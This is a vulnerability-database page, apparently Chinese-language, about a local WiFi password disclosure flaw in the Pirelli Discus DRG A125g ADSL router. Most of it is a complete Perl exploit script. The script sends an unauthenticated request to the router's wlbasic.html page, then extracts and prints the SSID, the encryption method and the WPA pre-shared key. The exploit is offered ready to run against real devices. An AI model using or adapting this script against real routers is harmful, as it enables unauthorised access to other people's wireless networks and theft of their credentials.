Pirelli Discus DRG A125g Local Password Disclosure Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044134 漏洞类型
发布时间 2013-11-24 更新时间 2013-11-24
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013110165
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl
 
#Author: Sebastin Magof
 
#Hardware: pirelli discus DRG A125g
 
#Vulnerable file: wlbasic.html
 
#Bug: Wifi Password Disclosure
 
#Type: Local
 
# (\/)
 
# (**) ±lpha
 
#(")(")
 
#usage:perl exploit.pl
 
use LWP::UserAgent;
 
use HTTP::Request;
 
#begin
 
print "\n\n************************************************************\n";
 
print "*  Pirelli Discus ADSL DRG A125g Wifi password disclosure  *\n";
 
print "************************************************************\n\n";
 
 
 
#wifi pwd disclosure file
 
my $url = "http://10.0.0.2/wlbasic.html";
 
 
 
#UserAgent
 
my $ua = LWP::UserAgent->new();
 
$ua->agent("Mozilla/5.0");
 
 
 
#Request.
 
my $req = HTTP::Request->new(GET => $url);
 
my $request = $ua->request($req);
 
my $content = $request->content(); #content
 
my ($ssi) = $content =~ m/ssid = '(.+)'/;
 
my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/;
 
my ($enc) = $content =~ m/var wpa = '(.+)'/;
 
#ssid+encryption method+pwd;
 
print "Ssid: $ssi\n";
 
print "Encryption method: $enc\n";
 
print "Password: $pwd\n\n";
 
exit(0);
 
 
 
__EOF__